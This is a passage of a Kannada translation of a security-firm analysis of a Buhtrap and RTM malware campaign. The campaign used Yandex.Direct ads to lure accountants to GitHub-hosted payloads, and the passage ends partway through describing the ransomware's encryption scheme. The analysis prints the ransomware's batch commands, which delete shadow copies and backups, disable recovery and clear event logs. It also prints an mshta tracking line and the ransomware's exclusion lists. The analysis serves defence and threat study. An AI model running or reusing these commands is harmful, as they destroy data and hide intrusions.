ಪ್ರೊಹೋಸ್ಟರ್ > Блог > ಆಡಳಿತ > ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ

ಸೈಬರ್ ದಾಳಿಯಲ್ಲಿ ಅಕೌಂಟೆಂಟ್‌ಗಳನ್ನು ಗುರಿಯಾಗಿಸಲು, ಅವರು ಆನ್‌ಲೈನ್‌ನಲ್ಲಿ ಹುಡುಕುವ ಕೆಲಸದ ದಾಖಲೆಗಳನ್ನು ನೀವು ಬಳಸಬಹುದು. ಕಳೆದ ಕೆಲವು ತಿಂಗಳುಗಳಿಂದ ಸೈಬರ್ ಗುಂಪು ಮಾಡುತ್ತಿರುವುದು ಸರಿಸುಮಾರು ಇದನ್ನೇ, ಗೊತ್ತಿರುವ ಹಿಂಬಾಗಿಲುಗಳನ್ನು ವಿತರಿಸುತ್ತಿದೆ. ಬುಹ್ಟ್ರಾಪ್ и ಆರ್ಟಿಎಂ, ಹಾಗೆಯೇ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿಗಳನ್ನು ಕದಿಯಲು ಎನ್‌ಕ್ರಿಪ್ಟರ್‌ಗಳು ಮತ್ತು ಸಾಫ್ಟ್‌ವೇರ್. ಹೆಚ್ಚಿನ ಗುರಿಗಳು ರಷ್ಯಾದಲ್ಲಿವೆ. Yandex.Direct ನಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತ ಜಾಹೀರಾತನ್ನು ಇರಿಸುವ ಮೂಲಕ ದಾಳಿಯನ್ನು ನಡೆಸಲಾಯಿತು. ಸಂಭಾವ್ಯ ಬಲಿಪಶುಗಳನ್ನು ವೆಬ್‌ಸೈಟ್‌ಗೆ ನಿರ್ದೇಶಿಸಲಾಯಿತು, ಅಲ್ಲಿ ಡಾಕ್ಯುಮೆಂಟ್ ಟೆಂಪ್ಲೇಟ್‌ನಂತೆ ಮಾರುವೇಷದಲ್ಲಿರುವ ದುರುದ್ದೇಶಪೂರಿತ ಫೈಲ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲು ಅವರನ್ನು ಕೇಳಲಾಯಿತು. ನಮ್ಮ ಎಚ್ಚರಿಕೆಯ ನಂತರ Yandex ದುರುದ್ದೇಶಪೂರಿತ ಜಾಹೀರಾತನ್ನು ತೆಗೆದುಹಾಕಿದೆ.

Buhtrap ನ ಮೂಲ ಕೋಡ್ ಹಿಂದೆ ಆನ್‌ಲೈನ್‌ನಲ್ಲಿ ಸೋರಿಕೆಯಾಗಿದೆ ಆದ್ದರಿಂದ ಯಾರಾದರೂ ಅದನ್ನು ಬಳಸಬಹುದು. RTM ಕೋಡ್ ಲಭ್ಯತೆಯ ಬಗ್ಗೆ ನಮಗೆ ಯಾವುದೇ ಮಾಹಿತಿ ಇಲ್ಲ.

ದಾಳಿಕೋರರು Yandex.Direct ಬಳಸಿಕೊಂಡು ಮಾಲ್‌ವೇರ್ ಅನ್ನು ಹೇಗೆ ವಿತರಿಸಿದರು ಮತ್ತು ಅದನ್ನು GitHub ನಲ್ಲಿ ಹೋಸ್ಟ್ ಮಾಡಿದ್ದಾರೆ ಎಂಬುದನ್ನು ಈ ಪೋಸ್ಟ್‌ನಲ್ಲಿ ನಾವು ನಿಮಗೆ ತಿಳಿಸುತ್ತೇವೆ. ಮಾಲ್‌ವೇರ್‌ನ ತಾಂತ್ರಿಕ ವಿಶ್ಲೇಷಣೆಯೊಂದಿಗೆ ಪೋಸ್ಟ್ ಮುಕ್ತಾಯವಾಗುತ್ತದೆ.

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ

Buhtrap ಮತ್ತು RTM ವ್ಯವಹಾರಕ್ಕೆ ಮರಳಿದೆ

ಹರಡುವಿಕೆ ಮತ್ತು ಬಲಿಪಶುಗಳ ಕಾರ್ಯವಿಧಾನ

ಬಲಿಪಶುಗಳಿಗೆ ವಿತರಿಸಲಾದ ವಿವಿಧ ಪೇಲೋಡ್‌ಗಳು ಸಾಮಾನ್ಯ ಪ್ರಸರಣ ಕಾರ್ಯವಿಧಾನವನ್ನು ಹಂಚಿಕೊಳ್ಳುತ್ತವೆ. ದಾಳಿಕೋರರು ರಚಿಸಿದ ಎಲ್ಲಾ ದುರುದ್ದೇಶಪೂರಿತ ಫೈಲ್‌ಗಳನ್ನು ಎರಡು ವಿಭಿನ್ನ GitHub ರೆಪೊಸಿಟರಿಗಳಲ್ಲಿ ಇರಿಸಲಾಗಿದೆ.

ವಿಶಿಷ್ಟವಾಗಿ, ರೆಪೊಸಿಟರಿಯು ಡೌನ್‌ಲೋಡ್ ಮಾಡಬಹುದಾದ ದುರುದ್ದೇಶಪೂರಿತ ಫೈಲ್ ಅನ್ನು ಹೊಂದಿರುತ್ತದೆ, ಅದು ಆಗಾಗ್ಗೆ ಬದಲಾಗುತ್ತಿತ್ತು. GitHub ನಲ್ಲಿ ರೆಪೊಸಿಟರಿಯ ಬದಲಾವಣೆಗಳ ಇತಿಹಾಸವನ್ನು ನೀವು ವೀಕ್ಷಿಸಬಹುದಾದ್ದರಿಂದ, ನಿರ್ದಿಷ್ಟ ಅವಧಿಯಲ್ಲಿ ಯಾವ ರೀತಿಯ ಮಾಲ್‌ವೇರ್ ಅನ್ನು ವಿತರಿಸಲಾಗಿದೆ ಎಂಬುದನ್ನು ನಾವು ನೋಡಬಹುದು. ದುರುದ್ದೇಶಪೂರಿತ ಫೈಲ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲು ಬಲಿಪಶುವನ್ನು ಮನವೊಲಿಸಲು, ಮೇಲಿನ ಚಿತ್ರದಲ್ಲಿ ತೋರಿಸಿರುವ ವೆಬ್‌ಸೈಟ್ blanki-shabloni24[.]ru ಅನ್ನು ಬಳಸಲಾಗಿದೆ.

ಸೈಟ್‌ನ ವಿನ್ಯಾಸ ಮತ್ತು ದುರುದ್ದೇಶಪೂರಿತ ಫೈಲ್‌ಗಳ ಎಲ್ಲಾ ಹೆಸರುಗಳು ಒಂದೇ ಪರಿಕಲ್ಪನೆಯನ್ನು ಅನುಸರಿಸುತ್ತವೆ - ಫಾರ್ಮ್‌ಗಳು, ಟೆಂಪ್ಲೇಟ್‌ಗಳು, ಒಪ್ಪಂದಗಳು, ಮಾದರಿಗಳು, ಇತ್ಯಾದಿ. ಈ ಹಿಂದೆ ಅಕೌಂಟೆಂಟ್‌ಗಳ ಮೇಲಿನ ದಾಳಿಯಲ್ಲಿ ಬುಹ್‌ಟ್ರಾಪ್ ಮತ್ತು ಆರ್‌ಟಿಎಂ ಸಾಫ್ಟ್‌ವೇರ್ ಅನ್ನು ಈಗಾಗಲೇ ಬಳಸಲಾಗಿದೆ ಎಂದು ನಾವು ಭಾವಿಸಿದ್ದೇವೆ ಹೊಸ ಅಭಿಯಾನದಲ್ಲಿ ತಂತ್ರವು ಒಂದೇ ಆಗಿದೆ. ದಾಳಿಕೋರರ ಸೈಟ್‌ಗೆ ಬಲಿಪಶು ಹೇಗೆ ಬಂದಳು ಎಂಬುದು ಒಂದೇ ಪ್ರಶ್ನೆ.

ಸೋಂಕು

ಈ ಸೈಟ್‌ನಲ್ಲಿ ಕೊನೆಗೊಂಡ ಕನಿಷ್ಠ ಹಲವಾರು ಸಂಭಾವ್ಯ ಬಲಿಪಶುಗಳು ದುರುದ್ದೇಶಪೂರಿತ ಜಾಹೀರಾತುಗಳಿಂದ ಆಕರ್ಷಿತರಾಗಿದ್ದಾರೆ. ಕೆಳಗೆ ಉದಾಹರಣೆ URL ಆಗಿದೆ:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

ನೀವು ಲಿಂಕ್‌ನಿಂದ ನೋಡುವಂತೆ, ಬ್ಯಾನರ್ ಅನ್ನು ಕಾನೂನುಬದ್ಧ ಲೆಕ್ಕಪತ್ರ ವೇದಿಕೆ bb.f2[.]kz ನಲ್ಲಿ ಪೋಸ್ಟ್ ಮಾಡಲಾಗಿದೆ. ಬ್ಯಾನರ್‌ಗಳು ವಿಭಿನ್ನ ಸೈಟ್‌ಗಳಲ್ಲಿ ಕಾಣಿಸಿಕೊಂಡಿವೆ, ಎಲ್ಲವೂ ಒಂದೇ ಪ್ರಚಾರ ಐಡಿ (blanki_rsya) ಮತ್ತು ಲೆಕ್ಕಪತ್ರ ನಿರ್ವಹಣೆ ಅಥವಾ ಕಾನೂನು ನೆರವು ಸೇವೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿದೆ ಎಂಬುದನ್ನು ಗಮನಿಸುವುದು ಮುಖ್ಯವಾಗಿದೆ. ಸಂಭಾವ್ಯ ಬಲಿಪಶು "ಡೌನ್‌ಲೋಡ್ ಇನ್‌ವಾಯ್ಸ್ ಫಾರ್ಮ್" ಅನ್ನು ಬಳಸಿದ್ದಾರೆ ಎಂದು URL ತೋರಿಸುತ್ತದೆ, ಇದು ಉದ್ದೇಶಿತ ದಾಳಿಗಳ ನಮ್ಮ ಊಹೆಯನ್ನು ಬೆಂಬಲಿಸುತ್ತದೆ. ಬ್ಯಾನರ್‌ಗಳು ಕಾಣಿಸಿಕೊಂಡ ಸೈಟ್‌ಗಳು ಮತ್ತು ಅನುಗುಣವಾದ ಹುಡುಕಾಟ ಪ್ರಶ್ನೆಗಳನ್ನು ಕೆಳಗೆ ನೀಡಲಾಗಿದೆ.

  • ಸರಕುಪಟ್ಟಿ ಫಾರ್ಮ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಿ - bb.f2[.]kz
  • ಮಾದರಿ ಒಪ್ಪಂದ - Ipopen[.]ru
  • ಅಪ್ಲಿಕೇಶನ್ ದೂರು ಮಾದರಿ - 77metrov[.]ru
  • ಒಪ್ಪಂದದ ರೂಪ - ಖಾಲಿ-ಡೋಗೋವರ್-ಕುಪ್ಲಿ-ಪ್ರೋಡಝಿ[.]ರು
  • ಮಾದರಿ ನ್ಯಾಯಾಲಯದ ಅರ್ಜಿ - zen.yandex[.]ru
  • ಮಾದರಿ ದೂರು - yurday[.]ru
  • ಮಾದರಿ ಒಪ್ಪಂದದ ನಮೂನೆಗಳು - Regforum[.]ru
  • ಒಪ್ಪಂದದ ರೂಪ - ಸಹಾಯಕ[.]ರು
  • ಮಾದರಿ ಅಪಾರ್ಟ್ಮೆಂಟ್ ಒಪ್ಪಂದ - napravah[.]com
  • ಕಾನೂನು ಒಪ್ಪಂದಗಳ ಮಾದರಿಗಳು - ಅವಿಟೊ[.]ರು

ಸರಳವಾದ ದೃಶ್ಯ ಮೌಲ್ಯಮಾಪನವನ್ನು ರವಾನಿಸಲು blanki-shabloni24[.]ru ಸೈಟ್ ಅನ್ನು ಕಾನ್ಫಿಗರ್ ಮಾಡಿರಬಹುದು. ವಿಶಿಷ್ಟವಾಗಿ, GitHub ಗೆ ಲಿಂಕ್‌ನೊಂದಿಗೆ ವೃತ್ತಿಪರವಾಗಿ ಕಾಣುವ ಸೈಟ್‌ಗೆ ಸೂಚಿಸುವ ಜಾಹೀರಾತು ನಿಸ್ಸಂಶಯವಾಗಿ ಕೆಟ್ಟದ್ದನ್ನು ತೋರುವುದಿಲ್ಲ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಆಕ್ರಮಣಕಾರರು ದುರುದ್ದೇಶಪೂರಿತ ಫೈಲ್‌ಗಳನ್ನು ರೆಪೊಸಿಟರಿಗೆ ಸೀಮಿತ ಅವಧಿಗೆ ಮಾತ್ರ ಅಪ್‌ಲೋಡ್ ಮಾಡುತ್ತಾರೆ, ಪ್ರಚಾರದ ಸಮಯದಲ್ಲಿ. ಹೆಚ್ಚಿನ ಸಮಯ, GitHub ರೆಪೊಸಿಟರಿಯು ಖಾಲಿ ಜಿಪ್ ಆರ್ಕೈವ್ ಅಥವಾ ಖಾಲಿ EXE ಫೈಲ್ ಅನ್ನು ಹೊಂದಿರುತ್ತದೆ. ಹೀಗಾಗಿ, ದಾಳಿಕೋರರು ನಿರ್ದಿಷ್ಟ ಹುಡುಕಾಟ ಪ್ರಶ್ನೆಗಳಿಗೆ ಪ್ರತಿಕ್ರಿಯೆಯಾಗಿ ಬಂದ ಅಕೌಂಟೆಂಟ್‌ಗಳು ಹೆಚ್ಚಾಗಿ ಭೇಟಿ ನೀಡಿದ ಸೈಟ್‌ಗಳಲ್ಲಿ Yandex.Direct ಮೂಲಕ ಜಾಹೀರಾತುಗಳನ್ನು ವಿತರಿಸಬಹುದು.

ಮುಂದೆ, ಈ ರೀತಿಯಲ್ಲಿ ವಿತರಿಸಲಾದ ವಿವಿಧ ಪೇಲೋಡ್‌ಗಳನ್ನು ನೋಡೋಣ.

ಪೇಲೋಡ್ ವಿಶ್ಲೇಷಣೆ

ವಿತರಣೆಯ ಕಾಲಗಣನೆ

ದುರುದ್ದೇಶಪೂರಿತ ಅಭಿಯಾನವು ಅಕ್ಟೋಬರ್ 2018 ರ ಕೊನೆಯಲ್ಲಿ ಪ್ರಾರಂಭವಾಯಿತು ಮತ್ತು ಬರೆಯುವ ಸಮಯದಲ್ಲಿ ಸಕ್ರಿಯವಾಗಿದೆ. ಸಂಪೂರ್ಣ ರೆಪೊಸಿಟರಿಯು GitHub ನಲ್ಲಿ ಸಾರ್ವಜನಿಕವಾಗಿ ಲಭ್ಯವಿರುವುದರಿಂದ, ನಾವು ಆರು ವಿಭಿನ್ನ ಮಾಲ್‌ವೇರ್ ಕುಟುಂಬಗಳ ವಿತರಣೆಯ ನಿಖರವಾದ ಟೈಮ್‌ಲೈನ್ ಅನ್ನು ಸಂಗ್ರಹಿಸಿದ್ದೇವೆ (ಕೆಳಗಿನ ಚಿತ್ರ ನೋಡಿ). git ಇತಿಹಾಸದೊಂದಿಗೆ ಹೋಲಿಕೆಗಾಗಿ ESET ಟೆಲಿಮೆಟ್ರಿಯಿಂದ ಅಳತೆ ಮಾಡಿದಂತೆ, ಬ್ಯಾನರ್ ಲಿಂಕ್ ಯಾವಾಗ ಪತ್ತೆಯಾಯಿತು ಎಂಬುದನ್ನು ತೋರಿಸುವ ಸಾಲನ್ನು ನಾವು ಸೇರಿಸಿದ್ದೇವೆ. ನೀವು ನೋಡುವಂತೆ, ಇದು GitHub ನಲ್ಲಿನ ಪೇಲೋಡ್‌ನ ಲಭ್ಯತೆಯೊಂದಿಗೆ ಚೆನ್ನಾಗಿ ಸಂಬಂಧ ಹೊಂದಿದೆ. ಫೆಬ್ರವರಿ ಅಂತ್ಯದ ವ್ಯತ್ಯಾಸವನ್ನು ನಾವು ಬದಲಾವಣೆಯ ಇತಿಹಾಸದ ಭಾಗವನ್ನು ಹೊಂದಿಲ್ಲ ಎಂಬ ಅಂಶದಿಂದ ವಿವರಿಸಬಹುದು ಏಕೆಂದರೆ ನಾವು ಅದನ್ನು ಪೂರ್ಣವಾಗಿ ಪಡೆಯುವ ಮೊದಲು ರೆಪೊಸಿಟರಿಯನ್ನು GitHub ನಿಂದ ತೆಗೆದುಹಾಕಲಾಗಿದೆ.

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ
ಚಿತ್ರ 1. ಮಾಲ್ವೇರ್ ವಿತರಣೆಯ ಕಾಲಗಣನೆ.

ಕೋಡ್ ಸಹಿ ಪ್ರಮಾಣಪತ್ರಗಳು

ಪ್ರಚಾರವು ಬಹು ಪ್ರಮಾಣಪತ್ರಗಳನ್ನು ಬಳಸಿದೆ. ಕೆಲವು ಒಂದಕ್ಕಿಂತ ಹೆಚ್ಚು ಮಾಲ್‌ವೇರ್ ಕುಟುಂಬಗಳಿಂದ ಸಹಿ ಮಾಡಲ್ಪಟ್ಟಿದೆ, ಇದು ವಿಭಿನ್ನ ಮಾದರಿಗಳು ಒಂದೇ ಅಭಿಯಾನಕ್ಕೆ ಸೇರಿದೆ ಎಂದು ಸೂಚಿಸುತ್ತದೆ. ಖಾಸಗಿ ಕೀಲಿಯ ಲಭ್ಯತೆಯ ಹೊರತಾಗಿಯೂ, ನಿರ್ವಾಹಕರು ಬೈನರಿಗಳಿಗೆ ವ್ಯವಸ್ಥಿತವಾಗಿ ಸಹಿ ಮಾಡಲಿಲ್ಲ ಮತ್ತು ಎಲ್ಲಾ ಮಾದರಿಗಳಿಗೆ ಕೀಲಿಯನ್ನು ಬಳಸಲಿಲ್ಲ. ಫೆಬ್ರವರಿ 2019 ರ ಅಂತ್ಯದಲ್ಲಿ, ಆಕ್ರಮಣಕಾರರು ತಮ್ಮ ಖಾಸಗಿ ಕೀಲಿಯನ್ನು ಹೊಂದಿಲ್ಲದ Google ಮಾಲೀಕತ್ವದ ಪ್ರಮಾಣಪತ್ರವನ್ನು ಬಳಸಿಕೊಂಡು ಅಮಾನ್ಯವಾದ ಸಹಿಗಳನ್ನು ರಚಿಸಲು ಪ್ರಾರಂಭಿಸಿದರು.

ಅಭಿಯಾನದಲ್ಲಿ ಒಳಗೊಂಡಿರುವ ಎಲ್ಲಾ ಪ್ರಮಾಣಪತ್ರಗಳು ಮತ್ತು ಅವರು ಸಹಿ ಮಾಡಿದ ಮಾಲ್‌ವೇರ್ ಕುಟುಂಬಗಳನ್ನು ಕೆಳಗಿನ ಕೋಷ್ಟಕದಲ್ಲಿ ಪಟ್ಟಿಮಾಡಲಾಗಿದೆ.

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ

ಇತರ ಮಾಲ್‌ವೇರ್ ಕುಟುಂಬಗಳೊಂದಿಗೆ ಲಿಂಕ್‌ಗಳನ್ನು ಸ್ಥಾಪಿಸಲು ನಾವು ಈ ಕೋಡ್ ಸಹಿ ಪ್ರಮಾಣಪತ್ರಗಳನ್ನು ಬಳಸಿದ್ದೇವೆ. ಹೆಚ್ಚಿನ ಪ್ರಮಾಣಪತ್ರಗಳಿಗಾಗಿ, GitHub ರೆಪೊಸಿಟರಿಯ ಮೂಲಕ ವಿತರಿಸದ ಮಾದರಿಗಳನ್ನು ನಾವು ಕಂಡುಹಿಡಿಯಲಿಲ್ಲ. ಆದಾಗ್ಯೂ, ಬಾಟ್‌ನೆಟ್‌ಗೆ ಸೇರಿದ ಮಾಲ್‌ವೇರ್‌ಗೆ ಸಹಿ ಹಾಕಲು TOV “MARIYA” ಪ್ರಮಾಣಪತ್ರವನ್ನು ಬಳಸಲಾಗಿದೆ ವೌಚಸ್, ಆಯ್ಡ್ವೇರ್ ಮತ್ತು ಮೈನರ್ಸ್. ಈ ಮಾಲ್‌ವೇರ್ ಈ ಅಭಿಯಾನಕ್ಕೆ ಸಂಬಂಧಿಸಿದೆ ಎಂಬುದು ಅಸಂಭವವಾಗಿದೆ. ಹೆಚ್ಚಾಗಿ, ಪ್ರಮಾಣಪತ್ರವನ್ನು ಡಾರ್ಕ್ನೆಟ್ನಲ್ಲಿ ಖರೀದಿಸಲಾಗಿದೆ.

Win32/Filecoder.Buhtrap

ನಮ್ಮ ಗಮನ ಸೆಳೆದ ಮೊದಲ ಅಂಶವೆಂದರೆ ಹೊಸದಾಗಿ ಪತ್ತೆಯಾದ Win32/Filecoder.Buhtrap. ಇದು ಡೆಲ್ಫಿ ಬೈನರಿ ಫೈಲ್ ಆಗಿದ್ದು ಇದನ್ನು ಕೆಲವೊಮ್ಮೆ ಪ್ಯಾಕ್ ಮಾಡಲಾಗುತ್ತದೆ. ಇದನ್ನು ಮುಖ್ಯವಾಗಿ ಫೆಬ್ರವರಿ-ಮಾರ್ಚ್ 2019 ರಲ್ಲಿ ವಿತರಿಸಲಾಯಿತು. ಇದು ransomware ಪ್ರೋಗ್ರಾಂಗೆ ಸರಿಹೊಂದುವಂತೆ ವರ್ತಿಸುತ್ತದೆ - ಇದು ಸ್ಥಳೀಯ ಡ್ರೈವ್‌ಗಳು ಮತ್ತು ನೆಟ್‌ವರ್ಕ್ ಫೋಲ್ಡರ್‌ಗಳನ್ನು ಹುಡುಕುತ್ತದೆ ಮತ್ತು ಪತ್ತೆಯಾದ ಫೈಲ್‌ಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ. ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಕೀಗಳನ್ನು ಕಳುಹಿಸಲು ಇದು ಸರ್ವರ್ ಅನ್ನು ಸಂಪರ್ಕಿಸದ ಕಾರಣ ರಾಜಿ ಮಾಡಿಕೊಳ್ಳಲು ಇಂಟರ್ನೆಟ್ ಸಂಪರ್ಕದ ಅಗತ್ಯವಿಲ್ಲ. ಬದಲಾಗಿ, ಇದು ಸುಲಿಗೆ ಸಂದೇಶದ ಅಂತ್ಯಕ್ಕೆ "ಟೋಕನ್" ಅನ್ನು ಸೇರಿಸುತ್ತದೆ ಮತ್ತು ಆಪರೇಟರ್‌ಗಳನ್ನು ಸಂಪರ್ಕಿಸಲು ಇಮೇಲ್ ಅಥವಾ ಬಿಟ್‌ಮೆಸೇಜ್ ಅನ್ನು ಬಳಸುವುದನ್ನು ಸೂಚಿಸುತ್ತದೆ.

ಸಾಧ್ಯವಾದಷ್ಟು ಸೂಕ್ಷ್ಮ ಸಂಪನ್ಮೂಲಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲು, Filecoder.Buhtrap ಪ್ರಮುಖ ಸಾಫ್ಟ್‌ವೇರ್ ಅನ್ನು ಮುಚ್ಚಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಥ್ರೆಡ್ ಅನ್ನು ರನ್ ಮಾಡುತ್ತದೆ, ಅದು ಎನ್‌ಕ್ರಿಪ್ಶನ್‌ನಲ್ಲಿ ಹಸ್ತಕ್ಷೇಪ ಮಾಡುವ ಮೌಲ್ಯಯುತ ಮಾಹಿತಿಯನ್ನು ಹೊಂದಿರುವ ತೆರೆದ ಫೈಲ್ ಹ್ಯಾಂಡ್ಲರ್‌ಗಳನ್ನು ಹೊಂದಿರುತ್ತದೆ. ಗುರಿ ಪ್ರಕ್ರಿಯೆಗಳು ಮುಖ್ಯವಾಗಿ ಡೇಟಾಬೇಸ್ ನಿರ್ವಹಣಾ ವ್ಯವಸ್ಥೆಗಳು (DBMS). ಹೆಚ್ಚುವರಿಯಾಗಿ, Filecoder.Buhtrap ಡೇಟಾ ಮರುಪಡೆಯುವಿಕೆ ಕಷ್ಟಕರವಾಗಿಸಲು ಲಾಗ್ ಫೈಲ್‌ಗಳು ಮತ್ತು ಬ್ಯಾಕ್‌ಅಪ್‌ಗಳನ್ನು ಅಳಿಸುತ್ತದೆ. ಇದನ್ನು ಮಾಡಲು, ಕೆಳಗಿನ ಬ್ಯಾಚ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ರನ್ ಮಾಡಿ.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap ವೆಬ್‌ಸೈಟ್ ಸಂದರ್ಶಕರ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಕಾನೂನುಬದ್ಧ ಆನ್‌ಲೈನ್ IP ಲಾಗರ್ ಸೇವೆಯನ್ನು ಬಳಸುತ್ತದೆ. ಇದು ransomware ನ ಬಲಿಪಶುಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಲು ಉದ್ದೇಶಿಸಲಾಗಿದೆ, ಇದು ಆಜ್ಞಾ ಸಾಲಿನ ಜವಾಬ್ದಾರಿಯಾಗಿದೆ:

mshta.exe "javascript:document.write('');"

ಮೂರು ಹೊರಗಿಡುವ ಪಟ್ಟಿಗಳಿಗೆ ಹೊಂದಿಕೆಯಾಗದಿದ್ದರೆ ಎನ್‌ಕ್ರಿಪ್ಶನ್‌ಗಾಗಿ ಫೈಲ್‌ಗಳನ್ನು ಆಯ್ಕೆ ಮಾಡಲಾಗುತ್ತದೆ. ಮೊದಲನೆಯದಾಗಿ, ಈ ಕೆಳಗಿನ ವಿಸ್ತರಣೆಗಳನ್ನು ಹೊಂದಿರುವ ಫೈಲ್‌ಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿಲ್ಲ: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ಮತ್ತು .ಬ್ಯಾಟ್. ಎರಡನೆಯದಾಗಿ, ಕೆಳಗಿನ ಪಟ್ಟಿಯಿಂದ ಸಂಪೂರ್ಣ ಮಾರ್ಗವು ಡೈರೆಕ್ಟರಿ ಸ್ಟ್ರಿಂಗ್‌ಗಳನ್ನು ಒಳಗೊಂಡಿರುವ ಎಲ್ಲಾ ಫೈಲ್‌ಗಳನ್ನು ಹೊರಗಿಡಲಾಗಿದೆ.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

ಮೂರನೆಯದಾಗಿ, ಕೆಲವು ಫೈಲ್ ಹೆಸರುಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಶನ್‌ನಿಂದ ಹೊರಗಿಡಲಾಗಿದೆ, ಅವುಗಳಲ್ಲಿ ಸುಲಿಗೆ ಸಂದೇಶದ ಫೈಲ್ ಹೆಸರು. ಪಟ್ಟಿಯನ್ನು ಕೆಳಗೆ ಪ್ರಸ್ತುತಪಡಿಸಲಾಗಿದೆ. ನಿಸ್ಸಂಶಯವಾಗಿ, ಈ ಎಲ್ಲಾ ವಿನಾಯಿತಿಗಳು ಯಂತ್ರವನ್ನು ಚಾಲನೆಯಲ್ಲಿಡಲು ಉದ್ದೇಶಿಸಲಾಗಿದೆ, ಆದರೆ ಕನಿಷ್ಠ ರಸ್ತೆ ಯೋಗ್ಯತೆಯೊಂದಿಗೆ.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ಫೈಲ್ ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಸ್ಕೀಮ್

ಒಮ್ಮೆ ಕಾರ್ಯಗತಗೊಳಿಸಿದ ನಂತರ, ಮಾಲ್‌ವೇರ್ 512-ಬಿಟ್ RSA ಕೀ ಜೋಡಿಯನ್ನು ಉತ್ಪಾದಿಸುತ್ತದೆ. ಖಾಸಗಿ ಘಾತಾಂಕ (d) ಮತ್ತು ಮಾಡ್ಯುಲಸ್ (n) ನಂತರ ಹಾರ್ಡ್-ಕೋಡೆಡ್ 2048-ಬಿಟ್ ಪಬ್ಲಿಕ್ ಕೀ (ಸಾರ್ವಜನಿಕ ಘಾತಾಂಕ ಮತ್ತು ಮಾಡ್ಯುಲಸ್), zlib-ಪ್ಯಾಕ್ಡ್ ಮತ್ತು ಬೇಸ್64 ಎನ್‌ಕೋಡ್‌ನೊಂದಿಗೆ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗುತ್ತದೆ. ಇದಕ್ಕೆ ಕಾರಣವಾದ ಕೋಡ್ ಅನ್ನು ಚಿತ್ರ 2 ರಲ್ಲಿ ತೋರಿಸಲಾಗಿದೆ.

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ
